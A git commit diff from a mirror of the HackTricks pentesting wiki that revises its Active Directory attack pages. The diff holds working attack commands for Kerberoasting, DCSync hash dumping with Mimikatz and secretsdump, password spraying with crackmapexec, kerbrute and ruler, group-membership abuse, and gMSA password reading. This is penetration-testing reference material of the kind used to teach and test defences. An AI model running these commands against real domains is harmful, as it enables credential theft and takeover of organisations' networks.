mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GitBook: [#3566] No subject
This commit is contained in:
parent
84ce66239c
commit
19efef6a05
8 changed files with 204 additions and 122 deletions
|
@ -12,7 +12,7 @@
|
|||
|
||||
</details>
|
||||
|
||||
**This information was copied from** [**https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **because it's just perfect**
|
||||
**This information was mostly copied from** [**https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) **because it's just perfect**
|
||||
|
||||
## Context
|
||||
|
||||
|
@ -36,6 +36,8 @@ Some of the Active Directory object permissions and types that we as attackers a
|
|||
|
||||
In this lab, we are going to explore and try to exploit most of the above ACEs.
|
||||
|
||||
It's worth familiarizing yourself with all of the [BloodHound edges](https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html) and as many Active Directory [Extended Rights](https://learn.microsoft.com/en-us/windows/win32/adschema/extended-rights) as possible as you never know when you may encounter a less common one during an assessment.
|
||||
|
||||
## GenericAll on User
|
||||
|
||||
Using powerview, let's check if our attacking user `spotless` has `GenericAll rights` on the AD object for the user `delegate`:
|
||||
|
@ -56,7 +58,16 @@ We can see that indeed our user `spotless` has the `GenericAll` rights, effectiv
|
|||
* **Targeted Kerberoasting**: You could make the user **kerberoastable** setting an **SPN** on the account, kerberoast it and attempt to crack offline:
|
||||
|
||||
```powershell
|
||||
Set-DomainObject -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}r
|
||||
# Set SPN
|
||||
Set-DomainObject -Credential $creds -Identity <username> -Set @{serviceprincipalname="fake/NOTHING"}
|
||||
# Get Hash
|
||||
.\Rubeus.exe kerberoast /user:<username> /nowrap
|
||||
# Clean SPN
|
||||
Set-DomainObject -Credential $creds -Identity <username> -Clear serviceprincipalname -Verbose
|
||||
|
||||
# You can also use the tool https://github.com/ShutdownRepo/targetedKerberoast
|
||||
# to get hashes of one or all the users
|
||||
python3 targetedKerberoast.py -domain.local -u <username> -p password -v
|
||||
```
|
||||
* **Targeted ASREPRoasting**: You could make the user **ASREPRoastable** by **disabling** **preauthentication** and then ASREProast it.
|
||||
|
||||
|
@ -237,6 +248,22 @@ Below shows the user's ~~`delegate`~~ logon script field got updated in the AD:
|
|||
|
||||
![](../../.gitbook/assets/21.png)
|
||||
|
||||
## GenericWrite on Group
|
||||
|
||||
This allows you to set as members of the group new users (yourself for example):
|
||||
|
||||
```powershell
|
||||
# Create creds
|
||||
$pwd = ConvertTo-SecureString 'JustAWeirdPwd!$' -AsPlainText -Force
|
||||
$creds = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $pwd)
|
||||
# Add user to group
|
||||
Add-DomainGroupMember -Credential $creds -Identity 'Group Name' -Members 'username' -Verbose
|
||||
# Check user was added
|
||||
Get-DomainGroupMember -Identity "Group Name" | Select MemberName
|
||||
# Remove group member
|
||||
Remove-DomainGroupMember -Credential $creds -Identity "Group Name" -Members 'username' -Verbose
|
||||
```
|
||||
|
||||
## WriteDACL + WriteOwner
|
||||
|
||||
If you are the owner of a group, like I'm the owner of a `Test` AD group:
|
||||
|
@ -481,15 +508,11 @@ Additionally, we could think about leveraging logon/logoff scripts, using regist
|
|||
|
||||
## References
|
||||
|
||||
{% embed url="https://wald0.com/?p=112" %}
|
||||
|
||||
{% embed url="https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2" %}
|
||||
|
||||
{% embed url="https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/" %}
|
||||
|
||||
{% embed url="https://adsecurity.org/?p=3658" %}
|
||||
|
||||
{% embed url="https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System_DirectoryServices_ActiveDirectoryAccessRule__ctor_System_Security_Principal_IdentityReference_System_DirectoryServices_ActiveDirectoryRights_System_Security_AccessControl_AccessControlType_" %}
|
||||
* [https://wald0.com/?p=112](https://wald0.com/?p=112)
|
||||
* [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2)
|
||||
* [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
|
||||
* [https://adsecurity.org/?p=3658](https://adsecurity.org/?p=3658)
|
||||
* [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System\_DirectoryServices\_ActiveDirectoryAccessRule\_\_ctor\_System\_Security\_Principal\_IdentityReference\_System\_DirectoryServices\_ActiveDirectoryRights\_System\_Security\_AccessControl\_AccessControlType\_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System\_DirectoryServices\_ActiveDirectoryAccessRule\_\_ctor\_System\_Security\_Principal\_IdentityReference\_System\_DirectoryServices\_ActiveDirectoryRights\_System\_Security\_AccessControl\_AccessControlType\_)
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -34,33 +34,46 @@ The **DCSync** permission implies having these permissions over the domain itsel
|
|||
|
||||
Check who has these permissions using `powerview`:
|
||||
|
||||
```bash
|
||||
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
|
||||
```powershell
|
||||
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
|
||||
```
|
||||
|
||||
### Exploit Locally
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
|
||||
```
|
||||
|
||||
### Exploit Remotely
|
||||
|
||||
```bash
|
||||
secretsdump.py -just-dc <user>:<password>@<ipaddress>
|
||||
```powershell
|
||||
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
|
||||
[-just-dc-user <USERNAME>] #To get only of that user
|
||||
[-pwd-last-set] #To see when each account's password was last changed
|
||||
[-history] #To dump password history, may be helpful for offline password cracking
|
||||
```
|
||||
|
||||
 `-just-dc` generates 3 files:
|
||||
|
||||
* one with the **NTLM hashes**
|
||||
* one withe the **Kerberos keys**
|
||||
* one with cleartext passwords from the NTDS for any accounts set with [**reversible encryption**](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption) **** enabled. You can get users with reversible encryption with 
|
||||
|
||||
```powershell
|
||||
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
|
||||
```
|
||||
|
||||
### Persistence
|
||||
|
||||
If you are a domain admin, you can grant this permissions to any user with the help of `powerview`:
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
|
||||
```
|
||||
|
||||
Then, you can **check if the user was correctly assigned** the 3 privileges looking for them in the output of (you should be able to see the names of the privileges inside the "ObjectType" field):
|
||||
|
||||
```bash
|
||||
```powershell
|
||||
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
|
||||
```
|
||||
|
||||
|
@ -71,7 +84,10 @@ Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveG
|
|||
* Security Event ID 4670 (Audit Policy for object must be enabled) – Permissions on an object were changed
|
||||
* AD ACL Scanner - Create and compare create reports of ACLs. [https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
|
||||
|
||||
[**More information about DCSync in ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync) [**More information about DCSync**](https://yojimbosecurity.ninja/dcsync/)
|
||||
## References
|
||||
|
||||
* [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync)
|
||||
* [https://yojimbosecurity.ninja/dcsync/](https://yojimbosecurity.ninja/dcsync/)
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -4,11 +4,15 @@
|
|||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -23,74 +27,37 @@ Notice that you **could lockout some accounts if you try several wrong passwords
|
|||
|
||||
### Get password policy
|
||||
|
||||
If you have some user credentials or a shell as a domain user you can **get the password policy with**:
|
||||
If you have some user credentials or a shell as a domain user you can get the password policy with:
|
||||
|
||||
```bash
|
||||
# From Linux
|
||||
crackmapexec <IP> -u 'user' -p 'password' --pass-pol
|
||||
* `crackmapexec <IP> -u 'user' -p 'password' --pass-pol`
|
||||
* `enum4linx -u 'username' -p 'password' -P <IP>`
|
||||
* `(Get-DomainPolicy)."SystemAccess" #From powerview`
|
||||
|
||||
enum4linx -u 'username' -p 'password' -P <IP>
|
||||
### Exploitation
|
||||
|
||||
rpcclient -U "" -N 10.10.10.10;
|
||||
rpcclient $>querydominfo
|
||||
|
||||
ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
|
||||
|
||||
# From Windows
|
||||
net accounts
|
||||
|
||||
(Get-DomainPolicy)."SystemAccess" #From powerview
|
||||
```
|
||||
|
||||
### Exploitation from Linux (or all)
|
||||
|
||||
* Using **crackmapexec:**
|
||||
Using **crackmapexec:**
|
||||
|
||||
```bash
|
||||
crackmapexec smb <IP> -u users.txt -p passwords.txt
|
||||
# Local Auth Spray (once you found some local admin pass or hash)
|
||||
## --local-auth flag indicate to only try 1 time per machine
|
||||
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
|
||||
```
|
||||
|
||||
* Using [**kerbrute**](https://github.com/ropnop/kerbrute) **** (Go)
|
||||
|
||||
```bash
|
||||
# Password Spraying
|
||||
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
|
||||
# Brute-Force
|
||||
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
|
||||
```
|
||||
|
||||
* [_**spray**_](https://github.com/Greenwolf/Spray) _**(you can indicate number of attempts to avoid lockouts):**_
|
||||
|
||||
```bash
|
||||
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
|
||||
```
|
||||
|
||||
* Using [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - NOT RECOMMENDED SOMETIMES DOESN'T WORK
|
||||
Using [kerbrute](https://github.com/TarlogicSecurity/kerbrute)(python) - NOT RECOMMENDED SOMETIMES DOESN'T WORK
|
||||
|
||||
```bash
|
||||
python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
|
||||
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt
|
||||
```
|
||||
|
||||
* With the `scanner/smb/smb_login` module of **Metasploit**:
|
||||
**Kerbrute** also tells if a username is valid.
|
||||
|
||||
![](<../../.gitbook/assets/image (132) (1).png>)
|
||||
|
||||
* Using **rpcclient**:
|
||||
Using [kerbrute](https://github.com/ropnop/kerbrute)(Go)
|
||||
|
||||
```bash
|
||||
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
|
||||
for u in $(cat users.txt); do
|
||||
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
|
||||
done
|
||||
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
|
||||
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman
|
||||
```
|
||||
|
||||
#### From Windows
|
||||
|
||||
* With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
|
||||
With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
|
||||
|
||||
```bash
|
||||
# with a list of users
|
||||
|
@ -100,21 +67,31 @@ done
|
|||
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
|
||||
```
|
||||
|
||||
* With [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (It can generate users from the domain by default and it will get the password policy from the domain and limit tries according to it):
|
||||
With the `scanner/smb/smb_login` module of Metasploit:
|
||||
|
||||
```powershell
|
||||
![](<../../.gitbook/assets/image (132) (1).png>)
|
||||
|
||||
With [Invoke-DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1)
|
||||
|
||||
```bash
|
||||
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
|
||||
```
|
||||
|
||||
* With [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)****
|
||||
or **spray** (read next section).
|
||||
|
||||
```
|
||||
Invoke-SprayEmptyPassword
|
||||
### Lockout check
|
||||
|
||||
The best way is not to try with more than 5/7 passwords per account.
|
||||
|
||||
So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use [_**spray**_](https://github.com/Greenwolf/Spray)_**:**_
|
||||
|
||||
```bash
|
||||
spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>
|
||||
```
|
||||
|
||||
## Outlook Web Access
|
||||
|
||||
There are multiples tools for p**assword spraying outlook**.
|
||||
There are multiples tools for password spraying outlook.
|
||||
|
||||
* With [MSF Owa\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_login/)
|
||||
* with [MSF Owa\_ews\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_ews\_login/)
|
||||
|
@ -125,25 +102,25 @@ There are multiples tools for p**assword spraying outlook**.
|
|||
To use any of these tools, you need a user list and a password / a small list of passwords to spray.
|
||||
|
||||
```bash
|
||||
./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
|
||||
$ ./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
|
||||
[x] Failed: larsson:Summer2020
|
||||
[x] Failed: cube0x0:Summer2020
|
||||
[x] Failed: a.admin:Summer2020
|
||||
[x] Failed: c.cube:Summer2020
|
||||
[+] Success: s.svensson:Summer2020
|
||||
[x] Failed: s.sven:Summer2020
|
||||
[x] Failed: j.jenny:Summer2020
|
||||
[x] Failed: t.teresa:Summer2020
|
||||
[x] Failed: t.trump:Summer2020
|
||||
[x] Failed: a.adams:Summer2020
|
||||
[x] Failed: l.larsson:Summer2020
|
||||
[x] Failed: CUBE0X0:Summer2020
|
||||
[x] Failed: A.ADMIN:Summer2020
|
||||
[x] Failed: C.CUBE:Summer2020
|
||||
[+] Success: S.SVENSSON:Summer2020
|
||||
```
|
||||
|
||||
## Google
|
||||
|
||||
* [https://github.com/ustayready/CredKing/blob/master/credking.py](https://github.com/ustayready/CredKing/blob/master/credking.py)
|
||||
|
||||
## Okta
|
||||
|
||||
* [https://github.com/ustayready/CredKing/blob/master/credking.py](https://github.com/ustayready/CredKing/blob/master/credking.py)
|
||||
* [https://github.com/Rhynorater/Okta-Password-Sprayer](https://github.com/Rhynorater/Okta-Password-Sprayer)
|
||||
* [https://github.com/knavesec/CredMaster](https://github.com/knavesec/CredMaster)
|
||||
|
||||
## References
|
||||
## References :
|
||||
|
||||
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying)
|
||||
* [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
|
||||
|
@ -154,10 +131,14 @@ To use any of these tools, you need a user list and a password / a small list of
|
|||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
|
|
@ -261,8 +261,11 @@ As detailed in this [**post**](http://www.labofapenetrationtester.com/2017/05/ab
|
|||
|
||||
Another way to **abuse DnsAdmins** group privileges is by creating a **WPAD record**. Membership in this group gives us the rights to [disable global query block security](https://docs.microsoft.com/en-us/powershell/module/dnsserver/set-dnsserverglobalqueryblocklist?view=windowsserver2019-ps), which by default blocks this attack. Server 2008 first introduced the ability to add to a global query block list on a DNS server. By default, Web Proxy Automatic Discovery Protocol (WPAD) and Intra-site Automatic Tunnel Addressing Protocol (ISATAP) are on the global query block list. These protocols are quite vulnerable to hijacking, and any domain user can create a computer object or DNS record containing those names.
|
||||
|
||||
After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.\
|
||||
After **disabling the global query** block list and creating a **WPAD record**, **every machine** running WPAD with default settings will have its **traffic proxied through our attack machine**. We could use a tool such as **** [**Responder**](https://github.com/lgandx/Responder) **or** [**Inveigh**](https://github.com/Kevin-Robertson/Inveigh) **to perform traffic spoofing**, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.
|
||||
|
||||
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
|
||||
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## **AD Recycle Bin**
|
||||
|
||||
|
@ -324,25 +327,6 @@ C:\htb> sc.exe start MozillaMaintenance
|
|||
This vector has been mitigated by the March 2020 Windows security updates, which changed behavior relating to hard links.
|
||||
{% endhint %}
|
||||
|
||||
## Group Managed Service Accounts (gMSA)
|
||||
|
||||
In most of the infrastructures, service accounts are typical user accounts with “**Password never expire**” option. Maintaining these accounts could be a real mess and that's why Microsoft introduced **Managed Service Accounts:**
|
||||
|
||||
* No more password management. It uses a complex, random, 240-character password and changes that automatically when it reaches the domain or computer password expire date.
|
||||
* It is uses Microsoft Key Distribution Service (KDC) to create and manage the passwords for the gMSA.
|
||||
* It cannot be lock out or use for interactive login
|
||||
* Supports to share across multiple hosts
|
||||
* Can use to run schedule tasks (Managed service accounts do not support to run schedule tasks)
|
||||
* Simplified SPN Management – System will automatically change the SPN value if **sAMaccount** details of the computer change or DNS name property change.
|
||||
|
||||
gMSA accounts have their passwords stored in a LDAP property called _**msDS-ManagedPassword**_ which **automatically** get **resets** by the DC’s every 30 days, are **retrievable** by **authorized administrators** and by the **servers** who they are installed on. _**msDS-ManagedPassword**_ is an encrypted data blob called [MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) and it’s only retrievable when the connection is secured, **LDAPS** or when the authentication type is ‘Sealing & Secure’ for an example.
|
||||
|
||||
![Image from https://cube0x0.github.io/Relaying-for-gMSA/](../../.gitbook/assets/asd1.png)
|
||||
|
||||
So, if gMSA is being used, find if it has **special privileges** and also check if you have **permissions** to **read** the password of the services.
|
||||
|
||||
Also, check this [web page](https://cube0x0.github.io/Relaying-for-gMSA/) about how to perform a **NTLM relay attack** to **read** the **password** of **gMSA**.
|
||||
|
||||
## References <a href="#references" id="references"></a>
|
||||
|
||||
{% embed url="https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges" %}
|
||||
|
|
|
@ -149,6 +149,31 @@ This way requires the **victim user** to be **running** a **process** inside the
|
|||
|
||||
{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
|
||||
|
||||
## Group Managed Service Accounts (gMSA)
|
||||
|
||||
In most of the infrastructures, service accounts are typical user accounts with “**Password never expire**” option. Maintaining these accounts could be a real mess and that's why Microsoft introduced **Managed Service Accounts:**
|
||||
|
||||
* No more password management. It uses a complex, random, 240-character password and changes that automatically when it reaches the domain or computer password expire date.
|
||||
* It is uses Microsoft Key Distribution Service (KDC) to create and manage the passwords for the gMSA.
|
||||
* It cannot be lock out or use for interactive login
|
||||
* Supports to share across multiple hosts
|
||||
* Can use to run schedule tasks (Managed service accounts do not support to run schedule tasks)
|
||||
* Simplified SPN Management – System will automatically change the SPN value if **sAMaccount** details of the computer change or DNS name property change.
|
||||
|
||||
gMSA accounts have their passwords stored in a LDAP property called _**msDS-ManagedPassword**_ which **automatically** get **resets** by the DC’s every 30 days, are **retrievable** by **authorized administrators** and by the **servers** who they are installed on. _**msDS-ManagedPassword**_ is an encrypted data blob called [MSDS-MANAGEDPASSWORD\_BLOB](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) and it’s only retrievable when the connection is secured, **LDAPS** or when the authentication type is ‘Sealing & Secure’ for an example.
|
||||
|
||||
![Image from https://cube0x0.github.io/Relaying-for-gMSA/](../.gitbook/assets/asd1.png)
|
||||
|
||||
So, if gMSA is being used, find if it has **special privileges** and also check if you have **permissions** to **read** the password of the services.
|
||||
|
||||
You can read this password with [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader)**:**
|
||||
|
||||
```
|
||||
/GMSAPasswordReader --AccountName jkohler
|
||||
```
|
||||
|
||||
Also, check this [web page](https://cube0x0.github.io/Relaying-for-gMSA/) about how to perform a **NTLM relay attack** to **read** the **password** of **gMSA**.
|
||||
|
||||
## LAPS
|
||||
|
||||
****[**Local Administrator Password Solution (LAPS)**](https://www.microsoft.com/en-us/download/details.aspx?id=46899) allows you to **manage the local Administrator password** (which is **randomised**, unique, and **changed regularly**) on domain-joined computers. These passwords are centrally stored in Active Directory and restricted to authorised users using ACLs. If your user is given enough permissions you might be able to read the passwords of the local admins.
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -87,6 +87,8 @@ Get-NetUser -UserName student107 #Get info about a user
|
|||
Get-NetUser -properties name, description #Get all descriptions
|
||||
Get-NetUser -properties name, pwdlastset, logoncount, badpwdcount #Get all pwdlastset, logoncount and badpwdcount
|
||||
Find-UserField -SearchField Description -SearchTerm "built" #Search account with "something" in a parameter
|
||||
# Get users with reversible encryption (PWD in clear text with dcsync)
|
||||
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
|
||||
|
||||
# Users Filters
|
||||
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE -properties distinguishedname #All enabled users
|
||||
|
@ -186,11 +188,24 @@ Learn how to **exploit permissions over GPOs and ACLs** in:
|
|||
### ACL
|
||||
|
||||
```bash
|
||||
Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs #Get ACLs of an object (permissions of other objects over the indicated one)
|
||||
Get-PathAcl -Path "\\dc.mydomain.local\sysvol" #Get permissions of a file
|
||||
Find-InterestingDomainAcl -ResolveGUIDs #Find intresting ACEs (Interesting permisions of "unexpected objects" (RID>1000 and modify permissions) over other objects
|
||||
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"} #Check if any of the interesting permissions founds is realated to a username/group
|
||||
Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights #Get special rights over All administrators in domain
|
||||
#Get ACLs of an object (permissions of other objects over the indicated one)
|
||||
Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs
|
||||
|
||||
#Other way to get ACLs of an object
|
||||
$sid = Convert-NameToSid <username/group>
|
||||
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
|
||||
|
||||
#Get permissions of a file
|
||||
Get-PathAcl -Path "\\dc.mydomain.local\sysvol"
|
||||
|
||||
#Find intresting ACEs (Interesting permisions of "unexpected objects" (RID>1000 and modify permissions) over other objects
|
||||
Find-InterestingDomainAcl -ResolveGUIDs
|
||||
|
||||
#Check if any of the interesting permissions founds is realated to a username/group
|
||||
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"}
|
||||
|
||||
#Get special rights over All administrators in domain
|
||||
